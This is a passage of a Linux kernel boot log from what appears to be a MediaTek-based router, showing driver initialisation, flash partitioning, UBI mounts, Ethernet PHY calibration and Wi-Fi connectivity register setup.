fixups for bus [ 0.017560] pci_bus 0000:00: bus scan returning with max=00 [ 0.017758] clocksource: Switched to clocksource arch_sys_counter [ 0.018334] thermal_sys: Registered thermal governor 'fair_share' [ 0.018337] thermal_sys: Registered thermal governor 'bang_bang' [ 0.018340] thermal_sys: Registered thermal governor 'step_wise' [ 0.018342] thermal_sys: Registered thermal governor 'user_space' [ 0.018343] thermal_sys: Registered thermal governor 'power_allocator' [ 0.018520] NET: Registered protocol family 2 [ 0.018596] IP idents hash table entries: 8192 (order: 4, 65536 bytes, linear) [ 0.018871] tcp_listen_portaddr_hash hash table entries: 256 (order: 0, 4096 bytes, linear) [ 0.018879] TCP established hash table entries: 4096 (order: 3, 32768 bytes, linear) [ 0.018897] TCP bind hash table entries: 4096 (order: 4, 65536 bytes, linear) [ 0.018933] TCP: Hash tables configured (established 4096 bind 4096) [ 0.018982] UDP hash table entries: 256 (order: 1, 8192 bytes, linear) [ 0.018991] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes, linear) [ 0.019061] NET: Registered protocol family 1 [ 0.019080] PCI: CLS 0 bytes, default 64 [ 0.019723] workingset: timestamp_bits=46 max_order=17 bucket_order=0 [ 0.022302] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 0.022359] exFAT: Version 1.3.0 [ 0.022389] ntfs3: Max link count 4000 [ 0.022772] Key type cifs.spnego registered [ 0.022777] Key type cifs.idmap registered [ 0.031151] mtk-pcie 11280000.pcie: host bridge /pcie@11280000 ranges: [ 0.031159] mtk-pcie 11280000.pcie: Parsing ranges property... [ 0.031165] mtk-pcie 11280000.pcie: MEM 0x20000000..0x2fffffff → 0x20000000 [ 0.237779] mtk-pcie 11280000.pcie: PCIe link down, ltssm reg val: 0x0 [ 0.237836] mtk-pcie: probe of 11280000.pcie failed with error -110 [ 0.245430] Serial: 8250/16550 driver, 3 ports, IRQ sharing disabled [ 0.245998] printk: console [ttyS0] disabled [ 0.266118] 11002000.serial: ttyS0 at MMIO 0x11002000 (irq = 12, base_baud = 2500000) is a ST16650V2 [ 0.266143] printk: console [ttyS0] enabled [ 0.266144] printk: bootconsole [uart8250] disabled [ 0.286534] 11003000.serial: ttyS1 at MMIO 0x11003000 (irq = 13, base_baud = 1625000) is a ST16650V2 [ 0.306914] 11004000.serial: ttyS2 at MMIO 0x11004000 (irq = 14, base_baud = 1625000) is a ST16650V2 [ 0.307401] mtk_rng 1020f000.trng: registered RNG driver [ 0.307506] cacheinfo: Unable to detect cache hierarchy for CPU 0 [ 0.307609] random: fast init done [ 0.307857] random: crng init done [ 0.309170] loop: module loaded [ 0.310346] spi-nor spi0.0: unrecognized JEDEC id bytes: ff c8 01 7f 7f 7f [ 0.310358] spi-nor: probe of spi0.0 failed with error -2 [ 0.310481] spi-nand spi0.1: GigaDevice SPI NAND was found. [ 0.310484] spi-nand spi0.1: 128 MiB, block size: 128 KiB, page size: 2048, OOB size: 64 [ 0.310767] SLP flash nand read [ 0.311335] Searching for RedBoot partition table [ 0.311343] 9 RedBoot partitions found on MTD device spi0.1 [ 0.311344] Creating 9 MTD partitions on “spi0.1”: [ 0.311349] 0x000000000000-0x0000000a0000 : “factory_boot” [ 0.312526] 0x000000100000-0x000000120000 : “factory_info” [ 0.313204] 0x000000160000-0x000000180000 : “art” [ 0.313995] 0x0000001c0000-0x0000003c0000 : “config” [ 0.316345] 0x0000003c0000-0x000000400000 : “normal_boot” [ 0.317126] 0x000000520000-0x000000ba0000 : “kernel” [ 0.323429] 0x000000c60000-0x000004460000 : “rootfs” [ 0.372583] mtd: device 6 (rootfs) set to be root filesystem [ 0.372828] part_is_squashfs:224 partition(rootfs) is squashfs [ 0.372881] 0x000006a00000-0x000008000000 : “rootfs_data” [ 0.392623] 0x0000004c0000-0x000005960000 : “firmware” [ 0.412399] mtd_device_parse_register add global full mtd:spi0.1 [ 0.413318] Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011) [ 0.413326] MII link monitoring set to 1000 ms [ 0.414347] libphy: Fixed MDIO Bus: probed [ 0.414756] rtk_8226b_probe begin [ 0.426240] libphy: mdio: probed [ 0.471169] mtk_soc_eth 15100000.ethernet: generated random MAC address 1e:98:7a:69:69:ab [ 0.471387] mtk_soc_eth 15100000.ethernet eth0: mediatek frame engine at 0xffffffc012680000, irq 124 [ 0.471407] mtk_soc_eth 15100000.ethernet: generated random MAC address 76:57:a7:1f:09:fe [ 0.471560] mtk_soc_eth 15100000.ethernet eth1: mediatek frame engine at 0xffffffc012680000, irq 124 [ 0.471565] (unnamed net_device) (dummy): netif_napi_add() called with weight 256 [ 0.471774] mediatek_soc_hnat 15100000.hnat: wan[0] = vir-eth6 [ 0.471777] mediatek_soc_hnat 15100000.hnat: wan[1] = vir-eth7 [ 0.471779] mediatek_soc_hnat 15100000.hnat: lan = vir-eth [ 0.471782] mediatek_soc_hnat 15100000.hnat: ppd = eth0 [ 0.471785] mediatek_soc_hnat 15100000.hnat: gmac num = 2 [ 0.471787] mediatek_soc_hnat 15100000.hnat: ppe num = 1 [ 0.472158] mediatek_soc_hnat 15100000.hnat: PPE0 entry number = 8192 [ 0.472506] mediatek_soc_hnat 15100000.hnat: PPE0 hwnat start [ 0.472543] hnat roaming work enable [ 0.472607] PPP generic driver version 2.4.2 [ 0.472724] PPP MPPE Compression module registered [ 0.472726] NET: Registered protocol family 24 [ 0.472737] PPTP driver version 0.8.5 [ 0.472911] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver [ 0.472917] ehci-pci: EHCI PCI platform driver [ 0.472948] ehci-platform: EHCI generic platform driver [ 0.473028] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver [ 0.473035] ohci-platform: OHCI generic platform driver [ 0.473247] xhci-mtk 11200000.xhci: 11200000.xhci supply vbus not found, using dummy regulator [ 0.473284] xhci-mtk 11200000.xhci: 11200000.xhci supply vusb33 not found, using dummy regulator [ 0.474039] xhci-mtk 11200000.xhci: xHCI Host Controller [ 0.474051] xhci-mtk 11200000.xhci: new USB bus registered, assigned bus number 1 [ 0.477126] xhci-mtk 11200000.xhci: hcc params 0x01403f99 hci version 0x110 quirks 0x0000000000210010 [ 0.477156] xhci-mtk 11200000.xhci: irq 134, io mem 0x11200000 [ 0.477536] hub 1-0:1.0: USB hub found [ 0.477557] hub 1-0:1.0: 2 ports detected [ 0.477735] xhci-mtk 11200000.xhci: xHCI Host Controller [ 0.477741] xhci-mtk 11200000.xhci: new USB bus registered, assigned bus number 2 [ 0.477765] xhci-mtk 11200000.xhci: Host supports USB 3.2 Enhanced SuperSpeed [ 0.477812] usb usb2: We don't know the algorithms for LPM for this host, disabling LPM. [ 0.478034] hub 2-0:1.0: USB hub found [ 0.478049] hub 2-0:1.0: 1 port detected [ 0.478321] ehci-fsl: Freescale EHCI Host controller driver [ 0.478441] usbcore: registered new interface driver uas [ 0.478479] usbcore: registered new interface driver usb-storage [ 0.478483] i2c /dev entries driver [ 0.479545] device-mapper: ioctl: 4.41.0-ioctl (2019-09-16) initialised: dm-devel@redhat.com [ 0.479642] Bluetooth: HCI UART driver ver 2.3 [ 0.479649] Bluetooth: HCI UART protocol H4 registered [ 0.479651] Bluetooth: HCI UART protocol BCSP registered [ 0.479700] Bluetooth: HCI UART protocol Broadcom registered [ 0.479717] Bluetooth: HCI UART protocol QCA registered [ 0.480037] crypto-safexcel 10320000.crypto: EIP97:230(0,1,4,4)-HIA:270(0,5,5),PE:150/433,alg:7fcdfc00 [ 0.483914] xt_time: kernel timezone is -0000 [ 0.483923] IPVS: Registered protocols (TCP, UDP, SCTP, AH, ESP) [ 0.483938] IPVS: Connection hash table configured (size=4096, memory=64Kbytes) [ 0.484030] IPVS: ipvs loaded. [ 0.484032] IPVS: [rr] scheduler registered. [ 0.484034] IPVS: [wrr] scheduler registered. [ 0.484035] IPVS: [lc] scheduler registered. [ 0.484036] IPVS: [wlc] scheduler registered. [ 0.484038] IPVS: [fo] scheduler registered. [ 0.484039] IPVS: [ovf] scheduler registered. [ 0.484044] IPVS: [lblc] scheduler registered. [ 0.484048] IPVS: [lblcr] scheduler registered. [ 0.484050] IPVS: [dh] scheduler registered. [ 0.484051] IPVS: [sh] scheduler registered. [ 0.484052] IPVS: [sed] scheduler registered. [ 0.484054] IPVS: [nq] scheduler registered. [ 0.484109] gre: GRE over IPv4 demultiplexor driver [ 0.484111] ip_gre: GRE over IPv4 tunneling driver [ 0.484756] Initializing XFRM netlink socket [ 0.484770] IPsec XFRM device driver [ 0.485001] NET: Registered protocol family 10 [ 0.485591] Segment Routing with IPv6 [ 0.486041] NET: Registered protocol family 17 [ 0.486053] NET: Registered protocol family 15 [ 0.486091] vdev_init_debugfs 62 virtual_dev init debug filesystem [ 0.486106] vdev_init_debugfs 79 virtual_dev creat debug filesystem success [ 0.486107] virtual_dev: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load virtual_dev_netfilter if you need this. [ 0.486119] l2tp_core: L2TP core driver, V2.0 [ 0.486124] l2tp_ppp: PPPoL2TP kernel driver, V2.0 [ 0.486125] l2tp_netlink: L2TP netlink interface [ 0.486142] 8021q: 802.1Q VLAN Support v1.8 [ 0.486163] Key type dns_resolver registered [ 0.921819] usb 2-1: new SuperSpeed Gen 1×2 USB device number 2 using xhci-mtk [ 0.944121] scsi host0: uas [ 1.054035] mt753x gsw@0: Switch is MediaTek MT7531AE rev 1 [ 1.057896] mt753x gsw@0: HWSTRAP=0xbd XTAL=25MHz [ 1.658760] scsi 0:0:0:0: Direct-Access Lexar USB Flash Drive 1100 PQ: 0 ANSI: 6 [ 1.669838] sd 0:0:0:0: [sda] 484841472 512-byte logical blocks: (248 GB/231 GiB) [ 1.669915] sd 0:0:0:0: [sda] Write Protect is off [ 1.669919] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00 [ 1.670076] sd 0:0:0:0: [sda] Write cache: disabled, read cache: enabled, doesn't support DPO or FUA [ 1.671873] sd 0:0:0:0: [sda] Optimal transfer size 33553920 bytes [ 1.678162] sda: sda1 [ 1.684120] sd 0:0:0:0: [sda] Attached SCSI disk [ 5.062586] mt753x gsw@0: IRQ index 0 not found [ 5.082955] libphy: mt753x_mdio: probed [ 5.299316] mt753x gsw@0: >>>>>>>>>>>>>>>>>>>>>>>>>>>>> START CALIBRATION: [ 5.300425] mt753x gsw@0: -------- gephy-calbration (port:0) -------- [ 5.309193] CALDLY = 40 [ 5.368743] 0x1e-e0 = 2929 [ 5.370446] 0x1f-115 = 5 [ 5.370448] GE Rext AnaCal Done! (9)(0x29) [ 5.416301] GE R50 AnaCal Done! (7) (0x37)(0xb7) [ 5.452668] GE R50 AnaCal Done! (6) (0x40)(0xc0) [ 5.489035] GE R50 AnaCal Done! (6) (0x40)(0xc0) [ 5.534501] GE R50 AnaCal Done! (8) (0x35)(0xb5) [ 5.537396] GE 1e_174(0xb7c0), 1e_175(0xc0b5) [ 5.574494] GE Tx offset AnaCal Done! (pair-0)(3)(0x22) 0x1e_172=0x2220 [ 5.601761] GE Tx offset AnaCal Done! (pair-1)(4)(0x23) 0x1e_172=0x2223 [ 5.615374] GE Tx offset AnaCal Done! (pair-2)(1)(0x1) 0x1e_173=0x120 [ 5.647192] GE Tx offset AnaCal Done! (pair-3)(5)(0x5) 0x1e_173=0x105 [ 5.732078] GE Tx amp AnaCal Done! (pair-0)(1e_12 = 0x4010) [ 5.775686] GE Tx amp AnaCal Done! (pair-1)(1e_17 = 0x1313) [ 5.822737] GE Tx amp AnaCal Done! (pair-2)(1e_19 = 0x1119) [ 5.852817] GE Tx amp AnaCal Done! (pair-3)(1e_21 = 0x1921) [ 5.893840] PORT 0 RX_DC_OFFSET [ 5.903369] before pairA output = 1c [ 5.905152] after pairA output = 0 [ 5.906857] before pairB output = f [ 5.908639] after pairB output = ff [ 5.910346] before pairC output = 1c [ 5.912129] after pairC output = 1 [ 5.913832] before pairD output = f [ 5.915615] after pairD output = fe [ 5.915873] mt753x gsw@0: -------- gephy-calbration (port:1) -------- [ 5.924640] CALDLY = 40 [ 5.979720] GE R50 AnaCal Done! (10) (0x32)(0xb2) [ 6.029739] GE R50 AnaCal Done! (9) (0x34)(0xb4) [ 6.079759] GE R50 AnaCal Done! (9) (0x34)(0xb4) [ 6.138879] GE R50 AnaCal Done! (11) (0x31)(0xb1) [ 6.141774] GE 1e_174(0xb2b4), 1e_175(0xb4b1) [ 6.174324] GE Tx offset AnaCal Done! (pair-0)(2)(0x21) 0x1e_172=0x2120 [ 6.192488] GE Tx offset AnaCal Done! (pair-1)(2)(0x21) 0x1e_172=0x2121 [ 6.219754] GE Tx offset AnaCal Done! (pair-2)(4)(0x23) 0x1e_173=0x2320 [ 6.247021] GE Tx offset AnaCal Done! (pair-3)(4)(0x23) 0x1e_173=0x2323 [ 6.314931] GE Tx amp AnaCal Done! (pair-0)(1e_12 = 0x681a) [ 6.352883] GE Tx amp AnaCal Done! (pair-1)(1e_17 = 0x1b1b) [ 6.411249] GE Tx amp AnaCal Done! (pair-2)(1e_19 = 0x1e26) [ 6.537499] GE Tx amp AnaCal Done! (pair-3)(1e_21 = 0x2a32) [ 6.578522] PORT 1 RX_DC_OFFSET [ 6.588050] before pairA output = e [ 6.589835] after pairA output = ff [ 6.591538] before pairB output = f [ 6.593320] after pairB output = 1 [ 6.595026] before pairC output = 1d [ 6.596809] after pairC output = ff [ 6.598512] before pairD output = d [ 6.600294] after pairD output = 2 [ 6.600552] mt753x gsw@0: -------- gephy-calbration (port:2) -------- [ 6.609319] CALDLY = 40 [ 6.673501] GE R50 AnaCal Done! (12) (0x30)(0xb0) [ 6.737172] GE R50 AnaCal Done! (12) (0x30)(0xb0) [ 6.800843] GE R50 AnaCal Done! (12) (0x30)(0xb0) [ 6.859963] GE R50 AnaCal Done! (11) (0x31)(0xb1) [ 6.862858] GE 1e_174(0xb0b0), 1e_175(0xb0b1) [ 6.890857] GE Tx offset AnaCal Done! (pair-0)(1)(0x1) 0x1e_172=0x120 [ 6.909024] GE Tx offset AnaCal Done! (pair-1)(2)(0x21) 0x1e_172=0x121 [ 6.931739] GE Tx offset AnaCal Done! (pair-2)(3)(0x22) 0x1e_173=0x2220 [ 6.945352] GE Tx offset AnaCal Done! (pair-3)(1)(0x1) 0x1e_173=0x2201 [ 7.024574] GE Tx amp AnaCal Done! (pair-0)(1e_12 = 0x4c13) [ 7.079493] GE Tx amp AnaCal Done! (pair-1)(1e_17 = 0x1d1d) [ 7.149173] GE Tx amp AnaCal Done! (pair-2)(1e_19 = 0x2129) [ 7.247140] GE Tx amp AnaCal Done! (pair-3)(1e_21 = 0x252d) [ 7.288164] PORT 2 RX_DC_OFFSET [ 7.297691] before pairA output = f [ 7.299474] after pairA output = 0 [ 7.301177] before pairB output = 1e [ 7.302959] after pairB output = ff [ 7.304662] before pairC output = f [ 7.306445] after pairC output = fe [ 7.308148] before pairD output = 1e [ 7.309930] after pairD output = fe [ 7.310188] mt753x gsw@0: -------- gephy-calbration (port:3) -------- [ 7.318955] CALDLY = 40 [ 7.383136] GE R50 AnaCal Done! (12) (0x30)(0xb0) [ 7.437706] GE R50 AnaCal Done! (10) (0x32)(0xb2) [ 7.492276] GE R50 AnaCal Done! (10) (0x32)(0xb2) [ 7.542295] GE R50 AnaCal Done! (9) (0x34)(0xb4) [ 7.545189] GE 1e_174(0xb0b2), 1e_175(0xb2b4) [ 7.573186] GE Tx offset AnaCal Done! (pair-0)(1)(0x1) 0x1e_172=0x120 [ 7.605002] GE Tx offset AnaCal Done! (pair-1)(5)(0x5) 0x1e_172=0x105 [ 7.632267] GE Tx offset AnaCal Done! (pair-2)(4)(0x23) 0x1e_173=0x2320 [ 7.650432] GE Tx offset AnaCal Done! (pair-3)(2)(0x21) 0x1e_173=0x2321 [ 7.723997] GE Tx amp AnaCal Done! (pair-0)(1e_12 = 0x5014) [ 7.790233] GE Tx amp AnaCal Done! (pair-1)(1e_17 = 0x2020) [ 7.848598] GE Tx amp AnaCal Done! (pair-2)(1e_19 = 0x1f27) [ 7.873019] GE Tx amp AnaCal Done! (pair-3)(1e_21 = 0x171f) [ 7.914043] PORT 3 RX_DC_OFFSET [ 7.923570] before pairA output = f [ 7.925353] after pairA output = 0 [ 7.927056] before pairB output = f [ 7.928838] after pairB output = 1 [ 7.930543] before pairC output = 1e [ 7.932326] after pairC output = 1 [ 7.934029] before pairD output = 1d [ 7.935812] after pairD output = ff [ 7.936070] mt753x gsw@0: -------- gephy-calbration (port:4) -------- [ 7.944837] CALDLY = 40 [ 7.990814] GE R50 AnaCal Done! (8) (0x35)(0xb5) [ 8.036282] GE R50 AnaCal Done! (8) (0x35)(0xb5) [ 8.081750] GE R50 AnaCal Done! (8) (0x35)(0xb5) [ 8.136321] GE R50 AnaCal Done! (10) (0x32)(0xb2) [ 8.139216] GE 1e_174(0xb5b5), 1e_175(0xb5b2) [ 8.180865] GE Tx offset AnaCal Done! (pair-0)(4)(0x23) 0x1e_172=0x2320 [ 8.203579] GE Tx offset AnaCal Done! (pair-1)(3)(0x3) 0x1e_172=0x2303 [ 8.230846] GE Tx offset AnaCal Done! (pair-2)(4)(0x23) 0x1e_173=0x2320 [ 8.244460] GE Tx offset AnaCal Done! (pair-3)(1)(0x1) 0x1e_173=0x2301 [ 8.334995] GE Tx amp AnaCal Done! (pair-0)(1e_12 = 0x4411) [ 8.418200] GE Tx amp AnaCal Done! (pair-1)(1e_17 = 0xc0c) [ 8.527481] GE Tx amp AnaCal Done! (pair-2)(1e_19 = 0x810) [ 8.585848] GE Tx amp AnaCal Done! (pair-3)(1e_21 = 0x1119) [ 8.626872] PORT 4 RX_DC_OFFSET [ 8.636399] before pairA output = 1e [ 8.638182] after pairA output = 1 [ 8.639884] before pairB output = e [ 8.641667] after pairB output = ff [ 8.643370] before pairC output = e [ 8.645153] after pairC output = 0 [ 8.646856] before pairD output = f [ 8.648639] after pairD output = ff [ 8.650683] svlan1: mbr[0x41] tag[0x40] pvid[1] [ 8.651195] svlan2: mbr[0x42] tag[0x40] pvid[2] [ 8.651707] svlan3: mbr[0x44] tag[0x40] pvid[3] [ 8.652218] svlan4: mbr[0x48] tag[0x40] pvid[4] [ 8.652730] svlan5: mbr[0x60] tag[0x40] pvid[5] [ 8.652860] rtk_8226b_probe begin [ 13.607802] rtk_8226b_probe end [ 13.607949] Registered character driver slp_flash_chrdev [ 13.608050] ubi0: attaching mtd7 [ 13.688189] ubi0: scanning is finished [ 13.693555] ubi0: attached mtd7 (name “rootfs_data”, size 22 MiB) [ 13.693558] ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes [ 13.693561] ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048 [ 13.693563] ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096 [ 13.693564] ubi0: good PEBs: 176, bad PEBs: 0, corrupted PEBs: 0 [ 13.693566] ubi0: user volume: 1, internal volumes: 1, max. volumes count: 128 [ 13.693569] ubi0: max/mean erase counter: 4/2, WL threshold: 4096, image sequence number: 1326262876 [ 13.693571] ubi0: available PEBs: 0, total reserved PEBs: 176, PEBs reserved for bad PEB handling: 10 [ 13.693577] ubi0: background thread “ubi_bgt0d” started, PID 940 [ 13.693582] ubi1: attaching mtd3 [ 13.701039] ubi1: scanning is finished [ 13.706321] ubi1: attached mtd3 (name “config”, size 2 MiB) [ 13.706324] ubi1: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes [ 13.706326] ubi1: min./max. I/O unit sizes: 2048/2048, sub-page size 2048 [ 13.706327] ubi1: VID header offset: 2048 (aligned 2048), data offset: 4096 [ 13.706329] ubi1: good PEBs: 16, bad PEBs: 0, corrupted PEBs: 0 [ 13.706331] ubi1: user volume: 1, internal volumes: 1, max. volumes count: 128 [ 13.706333] ubi1: max/mean erase counter: 17/11, WL threshold: 4096, image sequence number: 176664658 [ 13.706335] ubi1: available PEBs: 0, total reserved PEBs: 16, PEBs reserved for bad PEB handling: 10 [ 13.706341] ubi1: background thread “ubi_bgt1d” started, PID 943 [ 13.721717] Flash UID signiture check OK. [ 13.721722] hctosys: unable to open rtc device (rtc0) [ 13.721876] ps_bridge_main_init 1828 path selection module init... [ 13.725429] Successfully init multiple wifi [ 13.730619] VFS: Mounted root (squashfs filesystem) readonly on device 31:6. [ 13.734751] devtmpfs: mounted [ 13.734925] Freeing unused kernel memory: 512K [ 13.757775] Run /etc/preinit as init process [ 14.595687] mtk_soc_eth 15100000.ethernet eth0: configuring for fixed/2500base-x link mode [ 14.595772] mtk_soc_eth 15100000.ethernet eth0: Link is Up - 2.5Gbps/Full - flow control rx/tx [ 14.616537] UBIFS (ubi0:0): Mounting in unauthenticated mode [ 14.616610] UBIFS (ubi0:0): background thread “ubifs_bgt0_0” started, PID 1269 [ 14.644877] UBIFS (ubi0:0): recovery needed [ 14.729630] UBIFS (ubi0:0): recovery completed [ 14.729671] UBIFS (ubi0:0): UBIFS: mounted UBI device 0, volume 0, name “0” [ 14.729674] UBIFS (ubi0:0): LEB size: 126976 bytes (124 KiB), min./max. I/O unit sizes: 2048 bytes/2048 bytes [ 14.729677] UBIFS (ubi0:0): FS size: 19300352 bytes (18 MiB, 152 LEBs), journal size 1015809 bytes (0 MiB, 8 LEBs) [ 14.729679] UBIFS (ubi0:0): reserved for root: 911602 bytes (890 KiB) [ 14.729683] UBIFS (ubi0:0): media format: w5/r0 (latest is w5/r0), UUID CDCCC503-44B4-4EA8-A5AC-2E4D641E7C71, small LPT model [ 14.846001] icc: core inititalized with node ID 0, waiting for transport registration... [ 14.847918] icc: transport KERNELCALL registered [ 14.907319] conninfra@(mtk_conninfra_drv_init:644) Before platform_driver_register [ 14.907433] Get Index(0-TOP_MISC_BASE) phy_addr(0x11d10000) vir_addr=(0xffffffc01151f000) size=(0x1000) [ 14.907436] Get Index(1-TOPRGU_BASE) phy_addr(0x1001c000) vir_addr=(0xffffffc011521000) size=(0x1000) [ 14.907441] Get Index(2-GPIO_BASE) phy_addr(0x1001f000) vir_addr=(0xffffffc011523000) size=(0x1000) [ 14.907444] Get Index(3-IOCFG_TR_BASE) phy_addr(0x11f00000) vir_addr=(0xffffffc011527000) size=(0x1000) [ 14.907447] Get Index(4-IOCFG_TL_BASE) phy_addr(0x11f10000) vir_addr=(0xffffffc011529000) size=(0x1000) [ 14.907450] Get Index(5-INFRACFG_AO_BASE) phy_addr(0x10003000) vir_addr=(0xffffffc011537000) size=(0x1000) [ 14.907453] Get Index(6-CONN_INFRA_CFG_BASE) phy_addr(0x18001000) vir_addr=(0xffffffc011539000) size=(0x1000) [ 14.907457] Get Index(7-CONN_INFRA_SYSRAM_BASE) phy_addr(0x18050000) vir_addr=(0xffffffc01153f000) size=(0x1000) [ 14.907460] Get Index(8-CONN_INFRA_CLKGEN_ON_TOP_BASE) phy_addr(0x18009000) vir_addr=(0xffffffc011541000) size=(0x1000) [ 14.907464] Get Index(9-CONN_HOST_CSR_TOP_BASE) phy_addr(0x18060000) vir_addr=(0xffffffc011543000) size=(0x1000) [ 14.907467] Get Index(10-CONN_INFRA_BUS_CR_BASE) phy_addr(0x1800e000) vir_addr=(0xffffffc011547000) size=(0x1000) [ 14.907470] Get Index(11-CONN_INFRA_RGU_BASE) phy_addr(0x18000000) vir_addr=(0xffffffc011549000) size=(0x1000) [ 14.907473] Get Index(12-CONN_WT_SLP_CTL_REG_BASE) phy_addr(0x18005000) vir_addr=(0xffffffc01154f000) size=(0x1000) [ 14.907476] Get Index(13-INST2_CONN_WT_SLP_CTL_REG_BASE) phy_addr(0x18085000) vir_addr=(0xffffffc011551000) size=(0x1000) [ 14.907479] Get Index(14-CONN_RF_SPI_MST_REG_BASE) phy_addr(0x18004000) vir_addr=(0xffffffc011553000) size=(0x1000) [ 14.907482] Get Index(15-INST2_CONN_RF_SPI_MST_REG_BASE) phy_addr(0x18084000) vir_addr=(0xffffffc01155f000) size=(0x1000) [ 14.907488] Get Index(16-CONN_SEMAPHORE_BASE) phy_addr(0x18070000) vir_addr=(0xffffffc0118b0000) size=(0x10000) [ 14.907491] Get Index(17-CONN_AFE_CTL_BASE) phy_addr(0x18003000) vir_addr=(0xffffffc011561000) size=(0x1000) [ 14.907494] Get Index(18-CONN_AFE_CTL_2ND_BASE) phy_addr(0x18083000) vir_addr=(0xffffffc011563000) size=(0x1000) [ 14.907498] Get Index(19-WF_TOP_SLPPROT_ON_BASE) phy_addr(0x184c0000) vir_addr=(0xffffffc0118d0000) size=(0x10000) [ 14.907501] Get Index(20-WF_TOP_CFG_BASE) phy_addr(0x184b0000) vir_addr=(0xffffffc0115a8000) size=(0x1000) [ 14.907504] Get Index(21-WF_MCU_CONFIG_LS_BASE) phy_addr(0x184f0000) vir_addr=(0xffffffc0115aa000) size=(0x1000) [ 14.907507] Get Index(22-WF_MCU_BUS_CR_BASE) phy_addr(0x18400000) vir_addr=(0xffffffc0115af000) size=(0x1000) [ 14.907510] Get Index(23-WF_MCUSYS_INFRA_BUS_FULL_U_DEBUG_CTRL_AO_BASE) phy_addr(0x18500000) vir_addr=(0xffffffc0115b1000) size=(0x1000) [ 14.907514] Get Index(24-WF_TOP_CFG_ON_BASE) phy_addr(0x184c0000) vir_addr=(0xffffffc0118f0000) size=(0x10000) [ 14.907777] eeFlashId: 0x7986, EEPROM_content_valid = 1 [ 14.908463] conninfra@(consys_plt_hw_init:244) tx_stream = 0x4, rx_stream = 0x4, band0_pa_type = 0x3, band1_pa_type = 0x3 [ 14.908465] conninfra@(consys_plt_hw_init:253) adie_cfg_type = 2, one_adie_dbdc = 0 [ 14.908473] [emi_mng_init] gConEmiPhyBase = [0x4fc00000] size = [0x100000] fw size = [0x100000] ops=[0000000008b020e3] [ 14.908539] conninfra@(mtk_conninfra_drv_init:650) After platform_driver_register [ 14.909001] ConnInfra Dev: init (0) [ 14.910490] conninfra@(_consys_polling_chipid_int:482) Read CONNSYS HW IP version successfully! (0x02070000) [ 14.910495] conninfra@(consys_bus_clock_ctrl:508) drv=[4] conninfra_bus_clock_wpll=[0]→[16] enable [ 14.910500] conninfra@(connsys_d_die_cfg:553) D-die efuse: 0x00000000 [ 14.911536] conninfra@(_connsys_a_die_chip_id_confirm:1938) adie_idx[0]: A-die CHIP ID = 0x7976, HW Version = 0x8a20 [ 14.912549] conninfra@(_connsys_a_die_chip_id_confirm:1938) adie_idx[1]: A-die CHIP ID = 0x7976, HW Version = 0x8a20 [ 14.914567] conninfra@(consys_spi_write_nolock:693) addr = 0x0a00, val = 0xffffffff [ 14.915575] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.917589] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x00000000 [ 14.919603] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x43a60000 [ 14.925646] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008700ba, 0x00000000] [ 14.926654] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.928668] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x23a6003a [ 14.930682] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x63a7003a [ 14.936725] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008700ba, 0x00000000] [ 14.937732] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.939746] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x23a7003a [ 14.941761] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x63ac003a [ 14.947803] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008700ba, 0x00000000] [ 14.948811] conninfra@(consys_spi_write_nolock:693) addr = 0x0038, val = 0x4a563b00 [ 14.949818] conninfra@(consys_spi_write_nolock:693) addr = 0x065c, val = 0x1959f80f [ 14.950826] conninfra@(consys_spi_write_nolock:693) addr = 0x0664, val = 0x34c00fe0 [ 14.952843] conninfra@(consys_spi_write_nolock:693) addr = 0x0a00, val = 0xffffffff [ 14.953850] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.955864] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x00000000 [ 14.957878] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x43a60000 [ 14.963920] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008800b7, 0x00000000] [ 14.964928] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.966942] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x23a6003a [ 14.968956] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x63a7003a [ 14.974998] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008800b7, 0x00000000] [ 14.976006] conninfra@(consys_spi_write_nolock:693) addr = 0x0144, val = 0x00000002 [ 14.978020] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x23a7003a [ 14.980034] conninfra@(consys_spi_write_nolock:693) addr = 0x0148, val = 0x63ac003a [ 14.986076] conninfra@(connsys_a_die_efuse_read_nolock:929) efuse = [0x00000001, 0x00c40000, 0x008800b7, 0x00000000] [ 14.987083] conninfra@(consys_spi_write_nolock:693) addr = 0x0038, val = 0x4a563b00 [ 14.988091] conninfra@(consys_spi_write_nolock:693) addr = 0x065c, val = 0x1959f80f [ 14.989098] conninfra@(consys_spi_write_nolock:693) addr = 0x0664, val = 0x34c00fe0 [ 14.990107] conninfra@(consys_spi_write_nolock:693) addr = 0x0070, val = 0x88888005 [ 